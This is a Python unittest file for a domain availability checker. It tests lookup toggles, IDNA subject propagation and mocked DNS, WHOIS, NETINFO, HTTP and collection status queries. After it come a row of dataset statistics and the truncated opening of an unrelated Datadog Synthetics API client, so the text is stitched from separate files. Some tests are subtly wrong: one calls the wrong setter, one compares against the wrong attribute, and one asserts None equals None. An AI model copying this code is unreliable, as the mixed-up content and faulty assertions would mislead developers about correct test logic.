self.checker.set_use_extra_rules(given)
actual = self.checker.use_extra_rules
self.assertEqual(expected, actual)
def test_set_use_extra_rules_attribute(self) -> None:
"""
Tests the method which let us activate the special rules filtering
through the attribute.
"""
given = False
expected = False
self.checker.use_extra_rules = given
actual = self.checker.use_extra_rules
self.assertEqual(expected, actual)
def test_set_use_extra_rules_init(self) -> None:
"""
Tests the method which let us activate the special rules filtering
through the class constructor.
"""
checker = AvailabilityCheckerBase(use_extra_rules=False)
expected = False
actual = checker.use_extra_rules
self.assertEqual(expected, actual)
def test_set_use_extra_rules_not_bool(self) -> None:
"""
Tests the method which let us activate the special rules filtering
through the attribute.
In this use case we check the case that the inputted value is not a
:py:class:`bool`.
"""
given = ["Hello", "World!"]
self.assertRaises(TypeError, lambda: self.checker.set_use_extra_rules(given))
def test_guess_and_set_use_extra_rules(self) -> None:
"""
Tests the method which let us guess and set the value of the
:code`use_extra_rules` attribute.
"""
config_loader = ConfigLoader()
config_loader.custom_config = {"lookup": {"special": False}}
config_loader.start()
self.checker.guess_and_set_use_extra_rules()
expected = False
actual = self.checker.use_extra_rules
self.assertEqual(expected, actual)
del config_loader
def test_guess_and_set_use_extra_rules_config_not_loaded(self) -> None:
"""
Tests the method which let us guess and set the value of the
:code:`use_extra_rules` attribute; but for the case that the
configuration is not loaded.
"""
self.checker.guess_and_set_use_extra_rules()
expected = self.checker.STD_USE_EXTRA_RULES
actual = self.checker.use_extra_rules
self.assertEqual(expected, actual)
def test_set_use_whois_lookup_return(self) -> None:
"""
Tests the response of the method which let us activate the usage of
the WHOIS lookup method.
"""
given = False
actual = self.checker.set_use_whois_lookup(given)
self.assertIsInstance(actual, CheckerBase)
def test_set_use_whois_lookup_method(self) -> None:
"""
Tests the method which let us activate the usage of the WHOIS lookup
method.
"""
given = False
expected = False
self.checker.set_use_whois_lookup(given)
actual = self.checker.use_whois_lookup
self.assertEqual(expected, actual)
def test_set_use_whois_lookup_attribute(self) -> None:
"""
Tests the method which let us activate the usage of the WHOIS lookup
method through the attribute.
"""
given = False
expected = False
self.checker.use_whois_lookup = given
actual = self.checker.use_whois_lookup
self.assertEqual(expected, actual)
def test_set_use_whois_lookup_init(self) -> None:
"""
Tests the method which let us activate the usage of the WHOIS lookup
method through the class constructor.
"""
checker = AvailabilityCheckerBase(use_whois_lookup=False)
expected = False
actual = checker.use_whois_lookup
self.assertEqual(expected, actual)
def test_set_use_whois_lookup_not_bool(self) -> None:
"""
Tests the method which let us activate the usage of the WHOIS lookup
method.
In this case, we check the case that the inputted value is not a
:py:class:`bool`.
"""
given = ["Hello", "World!"]
self.assertRaises(TypeError, lambda: self.checker.set_use_whois_lookup(given))
def test_guess_and_set_use_whois_lookup(self) -> None:
"""
Tests the method which let us guess and set the value of the
:code`use_whois_lookup` attribute.
"""
config_loader = ConfigLoader()
config_loader.custom_config = {"lookup": {"whois": False}}
config_loader.start()
self.checker.guess_and_set_use_whois_lookup()
expected = False
actual = self.checker.use_whois_lookup
self.assertEqual(expected, actual)
del config_loader
def test_guess_and_set_use_whois_lookup_config_not_loaded(self) -> None:
"""
Tests the method which let us guess and set the value of the
:code:`use_whois_lookup` attribute; but for the case that the
configuration is not loaded.
"""
self.checker.guess_and_set_use_extra_rules()
expected = self.checker.STD_USE_WHOIS_LOOKUP
actual = self.checker.use_whois_lookup
self.assertEqual(expected, actual)
def test_set_use_dns_lookup_return(self) -> None:
"""
Tests the response of the method which let us activate the usage of
the DNS lookup method.
"""
given = False
actual = self.checker.set_use_dns_lookup(given)
self.assertIsInstance(actual, CheckerBase)
def test_set_use_dns_lookup_method(self) -> None:
"""
Tests the method which let us activate the usage of the DNS lookup
method.
"""
given = False
expected = False
self.checker.set_use_dns_lookup(given)
actual = self.checker.use_dns_lookup
self.assertEqual(expected, actual)
def test_set_dns_lookup_attribute(self) -> None:
"""
Tests the method which let us activate the usage of the DNS lookup
method through the attribute.
"""
given = False
expected = False
self.checker.use_dns_lookup = given
actual = self.checker.use_dns_lookup
self.assertEqual(expected, actual)
def test_set_use_dns_lookup_init(self) -> None:
"""
Tests the method which let us activate the usage of the DNS lookup
method through the class constructor.
"""
checker = AvailabilityCheckerBase(use_dns_lookup=False)
expected = False
actual = checker.use_dns_lookup
self.assertEqual(expected, actual)
def test_set_dns_lookup_not_bool(self) -> None:
"""
Tests the method which let us activate the usage of the DNS lookup
method.
Here we check the case that the inputted value is not a :py:class:`bool`.
"""
given = ["Hello", "World!"]
self.assertRaises(TypeError, lambda: self.checker.set_use_dns_lookup(given))
def test_guess_and_set_use_dns_lookup(self) -> None:
"""
Tests the method which let us guess and set the value of the
:code`use_dns_lookup` attribute.
"""
config_loader = ConfigLoader()
config_loader.custom_config = {"lookup": {"dns": False}}
config_loader.start()
self.checker.guess_and_set_dns_lookup()
expected = False
actual = self.checker.use_dns_lookup
self.assertEqual(expected, actual)
del config_loader
def test_guess_and_set_use_dns_lookup_config_not_loaded(self) -> None:
"""
Tests the method which let us guess and set the value of the
:code:`use_dns_lookup` attribute; but for the case that the
configuration is not loaded.
"""
self.checker.guess_and_set_dns_lookup()
expected = self.checker.STD_USE_DNS_LOOKUP
actual = self.checker.use_dns_lookup
self.assertEqual(expected, actual)
def test_set_use_netinfo_lookup_return(self) -> None:
"""
Tests the response of the method which let us activate the usage of
the NETINFO lookup method.
"""
given = False
actual = self.checker.set_use_netinfo_lookup(given)
self.assertIsInstance(actual, CheckerBase)
def test_set_use_netinfo_lookup_method(self) -> None:
"""
Tests the method which let us activate the usage of the NETINFO lookup
method.
"""
given = False
expected = False
self.checker.set_use_netinfo_lookup(given)
actual = self.checker.use_netinfo_lookup
self.assertEqual(expected, actual)
def test_set_netinfo_lookup_attribute(self) -> None:
"""
Tests the method which let us activate the usage of the NETINFO lookup
method through the attribute.
"""
given = False
expected = False
self.checker.use_netinfo_lookup = given
actual = self.checker.use_netinfo_lookup
self.assertEqual(expected, actual)
def test_set_use_netinfo_lookup_init(self) -> None:
"""
Tests the method which let us activate the usage of the NETINFO lookup
method through the class constructor.
"""
checker = AvailabilityCheckerBase(use_netinfo_lookup=False)
expected = False
actual = checker.use_netinfo_lookup
self.assertEqual(expected, actual)
def test_set_netinfo_lookup_not_bool(self) -> None:
"""
Tests the method which let us activate the usage of the NETINFO lookup
method.
Here we check the case that the inputted value is not a bool.
"""
given = ["Hello", "World!"]
self.assertRaises(TypeError, lambda: self.checker.set_use_netinfo_lookup(given))
def test_guess_and_set_use_netinfo_lookup(self) -> None:
"""
Tests the method which let us guess and set the value of the
:code`use_netinfo_lookup` attribute.
"""
config_loader = ConfigLoader()
config_loader.custom_config = {"lookup": {"netinfo": False}}
config_loader.start()
self.checker.guess_and_set_use_netinfo_lookup()
expected = False
actual = self.checker.use_netinfo_lookup
self.assertEqual(expected, actual)
del config_loader
def test_guess_and_set_use_netinfo_lookup_config_not_loaded(self) -> None:
"""
Tests the method which let us guess and set the value of the
:code:`use_netinfo_lookup` attribute; but for the case that the
configuration is not loaded.
"""
self.checker.guess_and_set_use_netinfo_lookup()
expected = self.checker.STD_USE_NETINFO_LOOKUP
actual = self.checker.use_netinfo_lookup
self.assertEqual(expected, actual)
def test_set_use_http_code_lookup_return(self) -> None:
"""
Tests the response of the method which let us activate the usage of
the HTTP Code lookup method.
"""
given = False
actual = self.checker.set_use_http_code_lookup(given)
self.assertIsInstance(actual, CheckerBase)
def test_set_use_http_code_lookup_method(self) -> None:
"""
Tests the method which let us activate the usage of the HTTP Code lookup
method.
"""
given = False
expected = False
self.checker.set_use_http_code_lookup(given)
actual = self.checker.use_http_code_lookup
self.assertEqual(expected, actual)
def test_set_use_http_code_lookup_attribute(self) -> None:
"""
Tests the method which let us activate the usage of the HTTP Code lookup
method through the attribute.
"""
given = False
expected = False
self.checker.use_http_code_lookup = given
actual = self.checker.use_http_code_lookup
self.assertEqual(expected, actual)
def test_set_use_http_code_lookup_init(self) -> None:
"""
Tests the method which let us activate the usage of the HTTP Code lookup
method through the class constructor.
"""
checker = AvailabilityCheckerBase(use_http_code_lookup=False)
expected = False
actual = checker.use_http_code_lookup
self.assertEqual(expected, actual)
def test_set_use_http_code_lookup_not_bool(self) -> None:
"""
Tests the method which let us activate the usage of the HTTP Code lookup
method.
Here we check the case that the inputted value is not a:py:class`bool`.
"""
given = ["Hello", "World!"]
self.assertRaises(
TypeError, lambda: self.checker.set_use_http_code_lookup(given)
)
def test_guess_and_set_use_http_code_lookup(self) -> None:
"""
Tests the method which let us guess and set the value of the
:code`use_http_code_lookup` attribute.
"""
config_loader = ConfigLoader()
config_loader.custom_config = {"lookup": {"http_status_code": False}}
config_loader.start()
self.checker.guess_and_set_use_http_code_lookup()
expected = False
actual = self.checker.use_http_code_lookup
self.assertEqual(expected, actual)
del config_loader
def test_guess_and_set_use_http_code_lookup_config_not_loaded(self) -> None:
"""
Tests the method which let us guess and set the value of the
:code:`use_http_code_lookup` attribute; but for the case that the
configuration is not loaded.
"""
self.checker.guess_and_set_use_http_code_lookup()
expected = self.checker.STD_USE_HTTP_CODE_LOOKUP
actual = self.checker.use_netinfo_lookup
self.assertEqual(expected, actual)
def test_set_use_reputation_lookup_return(self) -> None:
"""
Tests the response of the method which let us activate the usage of
the reputation lookup method.
"""
given = True
actual = self.checker.set_use_reputation_lookup(given)
self.assertIsInstance(actual, CheckerBase)
def test_set_use_reputation_lookup_method(self) -> None:
"""
Tests the method which let us activate the usage of the reputation
lookup method.
"""
given = True
expected = True
self.checker.set_use_reputation_lookup(given)
actual = self.checker.use_reputation_lookup
self.assertEqual(expected, actual)
def test_set_use_reputation_lookup_attribute(self) -> None:
"""
Tests the method which let us activate the usage of the reputation
lookup method through the attribute.
"""
given = True
expected = True
self.checker.use_reputation_lookup = given
actual = self.checker.use_reputation_lookup
self.assertEqual(expected, actual)
def test_set_use_reputation_lookup_init(self) -> None:
"""
Tests the method which let us activate the usage of the reputation
lookup method through the class constructor.
"""
checker = AvailabilityCheckerBase(use_reputation_lookup=True)
expected = True
actual = checker.use_reputation_lookup
self.assertEqual(expected, actual)
def test_set_use_reputation_lookup_not_bool(self) -> None:
"""
Tests the method which let us activate the usage of the reputation
lookup method through.
Here we check the case that the inputted value is not a:py:class`bool`.
"""
given = ["Hello", "World!"]
self.assertRaises(
TypeError, lambda: self.checker.set_use_reputation_lookup(given)
)
def test_guess_and_set_use_reputation_lookup(self) -> None:
"""
Tests the method which let us guess and set the value of the
:code`use_reputation_lookup` attribute.
"""
config_loader = ConfigLoader()
config_loader.custom_config = {"lookup": {"reputation": True}}
config_loader.start()
self.checker.guess_and_set_use_reputation_lookup()
expected = True
actual = self.checker.use_reputation_lookup
self.assertEqual(expected, actual)
del config_loader
def test_guess_and_set_use_reputation_lookup_config_not_loaded(self) -> None:
"""
Tests the method which let us guess and set the value of the
:code:`use_reputation_lookup` attribute; but for the case that the
configuration is not loaded.
"""
self.checker.guess_and_set_use_reputation_lookup()
expected = self.checker.STD_USE_REPUTATION_LOOKUP
actual = self.checker.use_reputation_lookup
self.assertEqual(expected, actual)
def test_set_use_whois_db_return(self) -> None:
"""
Tests the response of the method which let us activate the usage of
the WHOIS DB.
"""
given = False
actual = self.checker.set_use_whois_db(given)
self.assertIsInstance(actual, CheckerBase)
def test_set_use_whois_db_method(self) -> None:
"""
Tests the method which let us activate the usage of the WHOIS DB.
"""
given = False
expected = False
self.checker.set_use_whois_db(given)
actual = self.checker.use_whois_db
self.assertEqual(expected, actual)
def test_set_use_whois_db_attribute(self) -> None:
"""
Tests the method which let us activate the usage of the WHOIS DB
through the attribute.
"""
given = False
expected = False
self.checker.use_whois_db = given
actual = self.checker.use_whois_db
self.assertEqual(expected, actual)
def test_set_use_whois_db_init(self) -> None:
"""
Tests the method which let us activate the usage of the WHOIS DB
through the class constructor.
"""
checker = AvailabilityCheckerBase(use_whois_db=False)
expected = False
actual = checker.use_whois_db
self.assertEqual(expected, actual)
def test_set_use_whois_db_not_bool(self) -> None:
"""
Tests the method which let us activate the usage of the WHOIS DB.
Here we check the case that the inputted value is not a :py:class:`bool`.
"""
given = ["Hello", "World!"]
self.assertRaises(TypeError, lambda: self.checker.set_use_whois_db(given))
def test_guess_and_set_use_whois_db(self) -> None:
"""
Tests the method which let us guess and set the value of the
:code`use_whois_db` attribute.
"""
config_loader = ConfigLoader()
config_loader.custom_config = {"cli_testing": {"whois_db": False}}
config_loader.start()
self.checker.guess_and_set_use_whois_db()
expected = False
actual = self.checker.use_whois_db
self.assertEqual(expected, actual)
del config_loader
def test_guess_and_set_use_whois_db_config_not_loaded(self) -> None:
"""
Tests the method which let us guess and set the value of the
:code:`use_whois_db` attribute; but for the case that the
configuration is not loaded.
"""
self.checker.guess_and_set_use_whois_db()
expected = self.checker.STD_USE_WHOIS_DB
actual = self.checker.use_whois_db
self.assertEqual(expected, actual)
def test_subject_propagator(self) -> None:
"""
Tests that the subjects and its IDNA counterpart are correctly
propagated.
"""
given = "äxample.org"
expected_subject = "äxample.org"
expected_idna_subject = "xn--xample-9ta.org"
self.checker.subject = given
actual_subject = self.checker.status.subject
actual_idna_propagated = [
self.checker.dns_query_tool.subject,
self.checker.whois_query_tool.subject,
self.checker.addressinfo_query_tool.subject,
self.checker.hostbyaddr_query_tool.subject,
self.checker.http_status_code_query_tool.subject,
self.checker.domain_syntax_checker.subject,
self.checker.ip_syntax_checker.subject,
self.checker.url_syntax_checker.subject,
self.checker.status.idna_subject,
]
self.assertEqual(expected_subject, actual_subject)
for actual in actual_idna_propagated:
self.assertEqual(expected_idna_subject, actual)
# Now, just make sure that when overwrite, the status get changed
# propagated too.
given = "äxample.net"
expected_subject = "äxample.net"
expected_idna_subject = "xn--xample-9ta.net"
self.checker.subject = given
actual = self.checker.status.subject
actual_idna_propagated = [
self.checker.dns_query_tool.subject,
self.checker.whois_query_tool.subject,
self.checker.addressinfo_query_tool.subject,
self.checker.hostbyaddr_query_tool.subject,
self.checker.http_status_code_query_tool.subject,
self.checker.domain_syntax_checker.subject,
self.checker.ip_syntax_checker.subject,
self.checker.url_syntax_checker.subject,
self.checker.status.idna_subject,
]
self.assertEqual(expected_subject, actual)
for actual in actual_idna_propagated:
self.assertEqual(expected_idna_subject, actual)
def test_should_we_continue_test_positive(self) -> None:
"""
Tests the method which let us check if we should continue to another
test method.
"""
given = "INVALID"
self.checker.status.status = "INACTIVE"
expected = True
actual = self.checker.should_we_continue_test(given)
self.assertEqual(expected, actual)
def test_should_we_continue_test_negative(self) -> None:
"""
Tests the method which let us check if we should continue to another
test method.
"""
given = "VALID"
self.checker.status.status = "INACTIVE"
expected = False
actual = self.checker.should_we_continue_test(given)
self.assertEqual(expected, actual)
@unittest.mock.patch.object(DNSQueryTool, "query")
def test_query_dns_record(self, dns_query_patch: unittest.mock.MagicMock) -> None:
"""
Tests the method that let us query the (right) DNS record of the given
subject.
"""
dns_query_patch.return_value = ["192.168.1.1"]
given = "example.org"
expected = {"NS": ["192.168.1.1"]}
self.checker.subject = given
actual = self.checker.query_dns_record()
self.assertEqual(expected, actual)
@unittest.mock.patch.object(DNSQueryTool, "query")
def test_query_dns_record_no_response(
self, dns_query_patch: unittest.mock.MagicMock
) -> None:
"""
Tests the method that let us query the (right) DNS record of the given
subject.
Here we test the case that there is systematically no (valid) response.
"""
dns_query_patch.return_value = []
given = "example.net"
expected = dict() # pylint: disable=use-dict-literal
self.checker.subject = given
actual = self.checker.query_dns_record()
self.assertEqual(expected, actual)
@unittest.mock.patch.object(DNSQueryTool, "query")
def test_query_dns_record_subdomain(
self, dns_query_patch: unittest.mock.MagicMock
) -> None:
"""
Tests the method that let us query the (right) DNS record of the given
subject.
"""
dns_query_patch.return_value = ["192.168.1.2"]
given = "test.example.org"
expected = {"NS": ["192.168.1.2"]}
self.checker.subject = given
actual = self.checker.query_dns_record()
self.assertEqual(expected, actual)
@unittest.mock.patch.object(DNSQueryTool, "query")
def test_query_dns_record_ptr(
self, dns_query_patch: unittest.mock.MagicMock
) -> None:
"""
Tests the method that let us query the (right) DNS record of the given
subject.
"""
dns_query_patch.return_value = ["example.org"]
given = "192.168.1.1"
expected = {"PTR": ["example.org"]}
self.checker.subject = given
actual = self.checker.query_dns_record()
self.assertEqual(expected, actual)
def test_query_dns_record_no_subject(self) -> None:
"""
Tests the method that let us query the (right) DNS record of the given
subject.
In this case we test the case that the subject is not set.
"""
# pylint: disable=unnecessary-lambda
self.assertRaises(TypeError, lambda: self.checker.query_dns_record())
@unittest.mock.patch.object(DNSQueryTool, "query")
def test_query_dns_record_not_valid_subject(
self, dns_query_patch: unittest.mock.MagicMock
) -> None:
"""
Tests the method that let us query the (right) DNS record of the given
subject.
Here we test the case that the given subject is not correct.
"""
dns_query_patch.return_value = []
given = "a1"
expected = dict() # pylint: disable=use-dict-literal
self.checker.subject = given
actual = self.checker.query_dns_record()
self.assertEqual(expected, actual)
def test_try_to_query_status_from_whois(self) -> None:
"""
Tests the method which tries to define the status from the WHOIS record.
"""
# In this test, we don't care about the database.
self.checker.use_whois_db = False
self.checker.subject = "example.org"
# Let's test the case that no expiration date is found.
self.checker.whois_query_tool.get_expiration_date = lambda: None
self.checker.whois_query_tool.lookup_record.record = None
self.checker.try_to_query_status_from_whois()
expected_status = None
actual_status = self.checker.status.status
self.assertEqual(expected_status, actual_status)
expected_whois_record = None
actual_whois_record = self.checker.status.whois_record
self.assertEqual(expected_whois_record, actual_whois_record)
# Let's test the case that an expiration date is actually given.
self.checker.whois_query_tool.get_expiration_date = lambda: "10-nov-1971"
self.checker.whois_query_tool.lookup_record.record = "Hello, World!"
self.checker.try_to_query_status_from_whois()
expected_status = "ACTIVE"
actual_status = self.checker.status.status
self.assertEqual(expected_status, actual_status)
expected_source = "WHOIS"
actual_source = self.checker.status.status_source
self.assertEqual(expected_source, actual_source)
expected_whois_record = "Hello, World!"
actual_whois_record = self.checker.status.whois_record
self.assertEqual(expected_whois_record, actual_whois_record)
def test_try_to_query_status_from_dns(self) -> None:
"""
Tests the method that tries to define the status from the DNS lookup.
"""
# Let's test the case that no answer is given back.
# pylint: disable=unnecessary-lambda
self.checker.subject = "example.org"
self.checker.query_dns_record = (
lambda: dict() # pylint: disable=use-dict-literal
)
self.checker.try_to_query_status_from_dns()
expected_status = None
actual_status = self.checker.status.status
self.assertEqual(expected_status, actual_status)
# Let's test the case that an answer is given back.
self.checker.query_dns_record = lambda: {"NS": ["ns1.example.org"]}
self.checker.try_to_query_status_from_dns()
expected_status = "ACTIVE"
actual_status = self.checker.status.status
self.assertEqual(expected_status, actual_status)
expected_source = "DNSLOOKUP"
actual_source = self.checker.status.status_source
self.assertEqual(expected_source, actual_source)
def test_try_to_query_status_from_netinfo(self) -> None:
"""
Tests the method that tries to define the status from the NETINFO
lookup.
"""
# Let's test the case that nothing is given back.
self.checker.subject = "example.org"
self.checker.addressinfo_query_tool.get_info = lambda: None
self.checker.try_to_query_status_from_netinfo()
expected_status = None
actual_status = self.checker.status.status
self.assertEqual(expected_status, actual_status)
# Let's test the case that an answer is given back.
self.checker.addressinfo_query_tool.get_info = lambda: ["192.168.1.1"]
self.checker.try_to_query_status_from_netinfo()
expected_status = "ACTIVE"
actual_status = self.checker.status.status
self.assertEqual(expected_status, actual_status)
expected_source = "NETINFO"
actual_source = self.checker.status.status_source
self.assertEqual(expected_source, actual_source)
# Now the same test but with an IP.
self.checker.subject = "192.168.1.1"
self.checker.hostbyaddr_query_tool.get_info = lambda: None
self.checker.try_to_query_status_from_netinfo()
expected_status = None
actual_status = self.checker.status.status
self.assertEqual(expected_status, actual_status)
# Let's test the case that an answer is given back.
self.checker.hostbyaddr_query_tool.get_info = lambda: ["example.org"]
self.checker.try_to_query_status_from_netinfo()
expected_status = "ACTIVE"
actual_status = self.checker.status.status
self.assertEqual(expected_status, actual_status)
expected_source = "NETINFO"
actual_source = self.checker.status.status_source
self.assertEqual(expected_source, actual_source)
# Now a test with a digit string.
# This test exists because we shouldn't produce false positive.
self.checker.subject = "192"
self.checker.try_to_query_status_from_netinfo()
expected_status = None
actual_status = self.checker.status.status
self.assertEqual(expected_status, actual_status)
# Now the same test as before but for everything that may not exists
# publicly but in the local network.
#
# Let's test the case that nothing is given back.
self.checker.subject = "example"
self.checker.addressinfo_query_tool.get_info = lambda: None
self.checker.try_to_query_status_from_netinfo()
expected_status = None
actual_status = self.checker.status.status
self.assertEqual(expected_status, actual_status)
# Let's test the case that an answer is given back.
self.checker.addressinfo_query_tool.get_info = lambda: ["192.168.1.19"]
self.checker.try_to_query_status_from_netinfo()
expected_status = "ACTIVE"
actual_status = self.checker.status.status
self.assertEqual(expected_status, actual_status)
expected_source = "NETINFO"
actual_source = self.checker.status.status_source
self.assertEqual(expected_source, actual_source)
def test_try_to_query_status_from_http_status_code(self) -> None:
"""
Tests of the method that tries to define a status from the HTTP status
code.
"""
# Let's test the strange case that we meet mailto:xxx@yyy.de
self.checker.subject = "mailto:hello@world.de"
self.checker.http_status_code_query_tool.get_status_code = (
lambda: self.checker.http_status_code_query_tool.STD_UNKNOWN_STATUS_CODE
)
self.checker.try_to_query_status_from_http_status_code()
expected_subject = "mailto:hello@world.de"
actual_subject = self.checker.http_status_code_query_tool.subject
self.assertEqual(expected_subject, actual_subject)
expected_status = None
actual_status = None
self.assertEqual(expected_status, actual_status)
expected_status_code = None
actual_status_code = self.checker.status.http_status_code
self.assertEqual(expected_status_code, actual_status_code)
# Now, let's test a normal domain.
self.checker.subject = "example.org"
self.checker.http_status_code_query_tool.get_status_code = lambda: 200
self.checker.try_to_query_status_from_http_status_code()
expected_subject = "http://example.org:80"
actual_subject = self.checker.http_status_code_query_tool.subject
self.assertEqual(expected_subject, actual_subject)
expected_status = "ACTIVE"
actual_status = self.checker.status.status
self.assertEqual(expected_status, actual_status)
expected_source = "HTTP CODE"
actual_source = self.checker.status.status_source
self.assertEqual(expected_source, actual_source)
def test_try_to_query_status_from_syntax_lookup(self) -> None:
"""
Tests the method that tries to define the status from the syntax lookup.
"""
# Let's check the case that the subject is a valid domain.
self.checker.subject = "example.com"
self.checker.try_to_query_status_from_syntax_lookup()
expected_status = None
actual_status = self.checker.status.status
self.assertEqual(expected_status, actual_status)
# Let's check the case that the subject is an invalid one.
self.checker.subject = "102117110105108114121115"
self.checker.try_to_query_status_from_syntax_lookup()
expected_status = "INVALID"
actual_status = self.checker.status.status
self.assertEqual(expected_status, actual_status)
expected_source = "SYNTAX"
actual_source = self.checker.status.status_source
self.assertEqual(expected_source, actual_source)
@staticmethod
def fake_pull_response(subject: str) -> dict:
"""
Provides a fake pull response to work with.
:param subject:
The subject to work with.
"""
return {
"subject": subject,
"id": "3fa85f64-5717-4562-b3fc-2c963f66afa6",
"status": {
"syntax": {
"latest": {
"status": "INVALID",
"status_source": "SYNTAX",
"tested_at": "2021-09-28T19:32:07.167Z",
"id": "3fa85f64-5717-4562-b3fc-2c963f66afa6",
},
"frequent": "VALID",
"recommended": "VALID",
},
"availability": {
"latest": {
"status": "INACTIVE",
"status_source": "DNSLOOKUP",
"tested_at": "2021-09-28T19:32:07.167Z",
"id": "3fa85f64-5717-4562-b3fc-2c963f66afa6",
},
"frequent": "ACTIVE",
"recommended": "ACTIVE",
},
"reputation": {
"latest": {
"status": "MALICIOUS",
"status_source": "REPUTATION",
"tested_at": "2021-09-28T19:32:07.167Z",
"id": "3fa85f64-5717-4562-b3fc-2c963f66afa6",
},
"frequent": "SANE",
"recommended": "MALICIOUS",
},
"whois": {
"expiration_date": "2021-09-28T19:32:07.167Z",
"id": "3fa85f64-5717-4562-b3fc-2c963f66afa6",
"subject_id": "3fa85f64-5717-4562-b3fc-2c963f66afa6",
},
},
}
@staticmethod
def fake_response_no_data(_: str) -> None:
"""
Provides an empty response.
"""
return None
def test_try_to_query_status_from_collection(self) -> None:
"""
Tests the method that tries to define the status from the collection lookup.
"""
# Let's check the case that the subject is known.
self.checker.subject = "example.com"
self.checker.collection_query_tool.preferred_status_origin = "frequent"
self.checker.collection_query_tool.pull = self.fake_pull_response
self.checker.try_to_query_status_from_collection()
expected_status = "ACTIVE"
actual_status = self.checker.status.status
self.assertEqual(expected_status, actual_status)
expected_status_source = "COLLECTION"
actual_status_source = self.checker.status.status_source
self.assertEqual(expected_status_source, actual_status_source)
self.checker.collection_query_tool.preferred_status_origin = "latest"
self.checker.try_to_query_status_from_collection()
expected_status = "INACTIVE"
actual_status = self.checker.status.status
self.assertEqual(expected_status, actual_status)
expected_status_source = "COLLECTION"
actual_status_source = self.checker.status.status_source
self.assertEqual(expected_status_source, actual_status_source)
self.checker.collection_query_tool.preferred_status_origin = "recommended"
self.checker.try_to_query_status_from_collection()
expected_status = "ACTIVE"
actual_status = self.checker.status.status
self.assertEqual(expected_status, actual_status)
expected_status_source = "COLLECTION"
actual_status_source = self.checker.status.status_source
self.assertEqual(expected_status_source, actual_status_source)
# Let's check the case that the subject is unknown.
self.checker.subject = "102117110105108114121115"
self.checker.collection_query_tool.pull = self.fake_response_no_data
self.checker.try_to_query_status_from_collection()
expected_status = None
actual_status = self.checker.status.status
self.assertEqual(expected_status, actual_status)
expected_status_source = None
actual_status_source = self.checker.status.status_source
self.assertEqual(expected_status_source, actual_status_source)
def test_get_status(self) -> None:
"""
Tests the method that let us get the whole status object.
"""
self.test_try_to_query_status_from_syntax_lookup()
actual = self.checker.get_status()
self.assertIsInstance(actual, AvailabilityCheckerStatus)
if __name__ == "__main__":
unittest.main()
| 30.498549 | 88 | 0.641492 | 5,069 | 42,027 | 5.158019 | 0.068061 | 0.085405 | 0.071254 | 0.035493 | 0.857187 | 0.846286 | 0.814427 | 0.778972 | 0.743096 | 0.708483 | 0 | 0.011411 | 0.272254 | 42,027 | 1,377 | 89 | 30.520697 | 0.830669 | 0.239608 | 0 | 0.600666 | 0 | 0 | 0.051694 | 0.013538 | 0 | 0 | 0 | 0 | 0.161398 | 1 | 0.114809 | false | 0 | 0.011647 | 0 | 0.131448 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
72e19903a6c22df3eacfc58ab7c9c58c2899f1f4 | 88,264 | py | Python | src/datadog_api_client/v1/api/synthetics_api.py | rchenzheng/datadog-api-client-python | 2e86ac098c6f0c7fdd90ed218224587c0f8eafef | [
"Apache-2.0"
] | null | null | null | src/datadog_api_client/v1/api/synthetics_api.py | rchenzheng/datadog-api-client-python | 2e86ac098c6f0c7fdd90ed218224587c0f8eafef | [
"Apache-2.0"
] | null | null | null | src/datadog_api_client/v1/api/synthetics_api.py | rchenzheng/datadog-api-client-python | 2e86ac098c6f0c7fdd90ed218224587c0f8eafef | [
"Apache-2.0"
] | null | null | null | # Unless explicitly stated otherwise all files in this repository are licensed under the Apache-2.0 License.
# This product includes software developed at Datadog (https://www.datadoghq.com/).
# Copyright 2019-Present Datadog, Inc.
import re # noqa: F401
import sys # noqa: F401
from datadog_api_client.v1.api_client import ApiClient, Endpoint as _Endpoint
from datadog_api_client.v1.model_utils import ( # noqa: F401
check_allowed_values,
check_validations,
date,
datetime,
file_type,
none_type,
validate_and_convert_types,
)
from datadog_api_client.v1.model.api_error_response import APIErrorResponse
from datadog_api_client.v1.model.synthetics_api_test import SyntheticsAPITest
from datadog_api_client.v1.model.synthetics_api_test_result_full import SyntheticsAPITestResultFull
from datadog_api_client.v1.model.synthetics_browser_test import SyntheticsBrowserTest
from datadog_api_client.v1.model.synthetics_browser_test_result_full import SyntheticsBrowserTestResultFull
from datadog_api_client.v1.model.synthetics_ci_test_body import SyntheticsCITestBody
from datadog_api_client.v1.model.synthetics_delete_tests_payload import SyntheticsDeleteTestsPayload
from datadog_api_client.v1.model.synthetics_delete_tests_response import SyntheticsDeleteTestsResponse
from datadog_api_client.v1.model.synthetics_get_api_test_latest_results_response import (
SyntheticsGetAPITestLatestResultsResponse,
)
from datadog_api_client.v1.model.synthetics_get_browser_test_latest_results_response import (
SyntheticsGetBrowserTestLatestResultsResponse,
)
from datadog_api_client.v1.model.synthetics_global_variable import SyntheticsGlobalVariable
from datadog_api_client.v1.model.synthetics_list_global_variables_response import SyntheticsListGlobalVariablesResponse
from datadog_api_client.v1.model.synthetics_list_tests_response import SyntheticsListTestsResponse
from datadog_api_client.v1.model.synthetics_locations import SyntheticsLocations
from datadog_api_client.v1.model.synthetics_private_location import SyntheticsPrivateLocation
from datadog_api_client.v1.model.synthetics_private_location_creation_response import (
SyntheticsPrivateLocationCreationResponse,
)
from datadog_api_client.v1.model.synthetics_test_details import SyntheticsTestDetails
from datadog_api_client.v1.model.synthetics_trigger_ci_tests_response import SyntheticsTriggerCITestsResponse
from datadog_api_client.v1.model.synthetics_update_test_pause_status_payload import (
SyntheticsUpdateTestPauseStatusPayload,
)
class SyntheticsApi(object):
"""NOTE: This class is auto generated by OpenAPI Generator
Ref: https://openapi-generator.tech
Do not edit the class manually.
"""
def __init__(self, api_client=None):
if api_client is None:
api_client = ApiClient()
self.api_client = api_client
self._create_global_variable_endpoint = _Endpoint(
settings={
"response_type": (SyntheticsGlobalVariable,),
"auth": ["apiKeyAuth", "appKeyAuth"],
"endpoint_path": "/api/v1/synthetics/variables",
"operation_id": "create_global_variable",
"http_method": "POST",
"servers": None,
},
params_map={
"all": [
"body",
],
"required": [
"body",
],
"nullable": [],
"enum": [],
"validation": [],
},
root_map={
"validations": {},
"allowed_values": {},
"openapi_types": {
"body": (SyntheticsGlobalVariable,),
},
"attribute_map": {},
"location_map": {
"body": "body",
},
"collection_format_map": {},
},
